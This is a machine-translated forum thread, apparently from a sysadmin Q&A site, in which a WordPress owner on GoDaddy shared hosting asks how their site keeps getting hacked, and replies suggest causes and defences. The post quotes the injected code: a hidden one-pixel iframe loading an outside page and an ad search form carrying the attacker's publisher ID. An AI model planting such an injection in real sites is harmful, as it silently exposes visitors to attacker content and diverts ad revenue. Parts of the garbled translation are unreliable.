最终更新:
在过去的几个星期里,事情已经和平了,并且教会了我更多关于网站安全和风险的信息。 这是我的故事版本 –
我正在使用一个老版本的WordPress,可能这个人从谷歌抓到我。 我认为这是一个脚本攻击。 很难说什么时候,什么时候安全实际上是妥协的,这是我在2009年11月5日发现的。当时我采取了一些安全措施(如下所述),但总是有可能错过了在改变wordpress密码的时候我格式化了我的工作电脑。
现在我已经从主机中删除了所有不需要的PHP脚本,只让我的IP访问pipe理部分,阻止了一个属于越南的特定IP范围。 每日备份和其他的东西。 事情就是有太多的variables涉及到,而且很难跟踪每一件事情。 主要的教训是为它做好准备。 🙂
我正在通过GoDaddy共享托pipe计划并运行一个WordPress网站。 我的网站是在2009年11月5日第一次被黑客攻击的。当时黑客用自己的广告replace了我的广告。 我以为这是因为我对安全的懒惰而发生的,但是我错了。
我格式化了我的电脑,并再次设置一切。 用Microsoft Security Essentials取代了ESET NOD32。 升级到最新版本的WordPress。 更改了所有密码。 build立一个新的数据库。 和其他安全相关的东西我读到这里和那里。 事情有一段时间运行良好,直到我的网站今天再次被黑客攻击。
上次,这个人玩了很多文件,特别是改变了footer.php和所有与广告有关的文件。 但是这次他只是去了正确的地方,换成下面的代码 –
<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME> <form action="http://www.google.com/cse" id="cse-search-box"> <div> <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" /> <input type="hidden" name="ie" value="ISO-8859-1" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> 看起来这个人对操纵数据库等不感兴趣,而只是放置代码,快速赚钱。 Godaddy转发我的FTP日志,并有从IP – 117.2.56.31未经授权的访问。 这个IP属于越南,而且http://blackberryrss.com与越南有一些联系。
我的帐户没有SSH访问权限,我使用FireFTP连接到FTP。 这是GoDaddy上次的回应 –
在审查您的帐户后,我们发现您的FTP帐户已被盗用,或者是由于本地计算机上的恶意软件或FTP / Hosting密码太弱。
但我已经改变了所有的密码,删除帐户等,但似乎没有工作。 我现在无能为力。 请告诉我该怎么办? 我怎样才能防止未经授权访问我的帐户??????
额外细节:
请牢记FTP以CLEAR TEXT格式发送您的密码。 所以妥协的可能性肯定是存在的。
另一个要考虑的是,你的FTP密码UNIQUE到你的托pipe? 你确定你没有使用它吗? 没有其他帐户,网站等?
您的EMAIL密码有多安全? 我曾经参与过这个“薄弱环节”实际上是EMAIL密码的案件,罪魁祸首就是把“忘记的密码”发送到电子邮件中,并删除了电子邮件箱中的证据,而每个人都忙于关注被入侵的服务器注意。
只是想到了一些事情…当然,其他一些事情将是一个社会工程方法与您的ISP或您的服务器上的一些软件漏洞或您的托pipe包之一。
还有更多(显然),但通常是“通常的嫌疑人”。
更新:
根据这个新的信息(黑客不使用FTP来更改文件),我只能假设最可能的原因可能是一个不安全的Web应用程序。
这不是唯一的事情,但在这种情况下是最有可能的。
另一件需要考虑的事情是,如果他给自己的应用程序留下了某种“后门”的话。 我似乎记得你之前提到过你的ISP说他是通过FTP进来的。 他有可能第一次通过FTP进来,为自己留下一个后门?
另外,它在黑暗中是一枪,但是我亲眼目睹了一个黑客只能一次进来的妥协盒子,但留下了一个不断更换文件和其他各种邪恶的cron工作。 黑客可能不会回来,你正在处理一个自动脚本? 只是要检查你是否已经用尽了所有其他的可能性。
最后,你有没有访问你的networking日志,系统日志等? 如果是这样,他们说什么? 他们是否有任何线索?
您可能想要阅读WordPress黑客的详细后验 。 另一篇文章给出了很多关于WordPress博客的链接的信息。 WordPress本身有一个常见问题,关于你的博客被黑客攻击后应该怎么做。
WordPress是一个非常有针对性的应用程序,只是因为它的普及。 打击这些网站的黑客是一个全职工作。 从你的描述来看,这听起来像是有人发现WordPress的利用正在充分利用它。 你听起来像你到目前为止一切正常,但我认为,攻击者正在把一个文件放入你的网站和从这个方向的攻击。 我指出的第一个链接是对这个非常详细的描述,以及他们采取什么措施来对付它。
最后,你可能不得不考虑从WordPress转换到另一个博客应用程序。 祝你自己好运,并希望这有助于一些。
GoDaddy为您提供SSH访问 ,您可以使用端口22上的Putty.exe连接到您的帐户。一旦连接,您可以使用Putty在端口20和21上创build2个代理/隧道。然后,您可以使用ftp通过安全隧道到你的文件。
或者,更好的是,您可以使用PSFTP.exe命令更简单地执行相同的操作,也可以使用FileZilla客户端连接到端口22。
愚蠢的问题,但 – 你有没有尝试更改密码,并使用另一台电脑? 也许在你的电脑上有一个按键logging器。
我怀疑这里有恶作剧,或者至less有针对性的攻击。 你知道有谁愿意玩这样的笑话..?
得到太偏执之前,走出箱子。 它有助于。
ps:或者是一个误用的wordpress主题。 或DB访问权限错误凭据。
除非你通过一个安全隧道运行所有的FTP会话(或者更好的办法是使用sftp),否则这个密码会被嗅探到。
我们的标准做法是根本没有FTP。 如果需要的话,我们只允许匿名FTP,并严格限制到一个已知的地区。
如果需要上传,我们不允许列出上传目录。
说实话,我会要求ISP在防火墙级别阻止该IP。 如果GoDaddy不愿意这样做,那么对我来说,这似乎是一个不负责任的托pipe人,他不会采取措施来保护您的数据,您应该切换。
blackberryrss.com位于美国,所以你有一些杠杆,你可以采取:
DNS的东西
在这里举报发布者ID,Google在AdSensenetworking内发生欺诈活动时非常严肃。 举报Google Adsense滥用行为
其实老实说,GoDaddy甚至不应该让它进入,因为这个IP的反向DNS是一个巨大的红旗“本地主机”。 只有一个IPv4地址应该parsing为本地主机(当然假设我们只是谈论标准IP地址),那就是127.0.0.1。 DNS的东西
要深入挖掘兔子洞,似乎bluehost正在托pipe他们的服务器,所以给他们一个戒指,看看他们想做什么(如果有的话)。
而且您始终可以select向当地主pipe部门报告(访问您无权访问的networking和计算机是犯罪行为)
你的FTP密码被嗅探,这发生在我们的网站托pipe了很多。